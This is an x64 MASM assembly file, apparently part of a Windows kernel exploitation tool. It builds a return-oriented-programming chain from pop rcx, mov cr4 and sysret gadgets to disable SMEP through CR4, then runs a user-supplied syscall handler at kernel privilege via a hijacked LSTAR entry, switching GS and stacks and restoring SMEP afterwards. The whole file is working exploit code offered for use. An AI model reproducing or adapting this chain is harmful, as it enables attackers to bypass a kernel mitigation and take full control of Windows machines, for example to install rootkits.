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; offsets into _KPCR/_KPRCB
m_kpcr_rsp_offset dq 0h
m_kpcr_krsp_offset dq 0h
m_system_call dq 0h
m_mov_cr4_gadget dq 0h
m_sysret_gadget dq 0h
m_pop_rcx_gadget dq 0h
m_smep_on dq 0h
m_smep_off dq 0h
; all of these are setup by the c++ code...
public m_smep_on
public m_smep_off
public m_kpcr_rsp_offset
public m_kpcr_krsp_offset
public m_pop_rcx_gadget
public m_mov_cr4_gadget
public m_sysret_gadget
public m_system_call
syscall_handler proc
cli ; smep is disabled and LSTAR is still not restored at this point... ; we dont want the thread schedular to smoke us...
swapgs ; swap gs to kernel gs, and switch to kernel stack...
mov gs:m_kpcr_rsp_offset, rsp
mov rsp, gs:m_kpcr_krsp_offset
push rcx ; push RIP
push r11 ; push EFLAGS
mov rcx, r10 ; swapped by syscall...
sub rsp, 020h
; call msrexec_handler
add rsp, 020h
pop r11 ; pop EFLAGS
pop rcx ; pop RIP
mov rsp, gs:m_kpcr_rsp_offset ; restore rsp...
sti ; we will be enabling smep in the next return...
mov rax, m_smep_on ; cr4 will be set to rax in the next return...
syscall_handler endp
syscall_wrapper proc
push r10
mov r10, rcx ; rcx contains RIP after syscall instruction is executed...
push m_sysret_gadget ; rop to sysret...
lea rax, finish ; push rip back into rax...
push rax
push m_pop_rcx_gadget
push m_mov_cr4_gadget ; enable smep...
push m_smep_on
push m_pop_rcx_gadget
lea rax, syscall_handler ; rop from mov cr4 gadget to syscall handler...
push rax
push m_mov_cr4_gadget ; rop from syscall handler to enable smep again...
push m_smep_off ; gets pop'ed into rcx by gadget at LSTAR...
pop r10
syscall_wrapper endp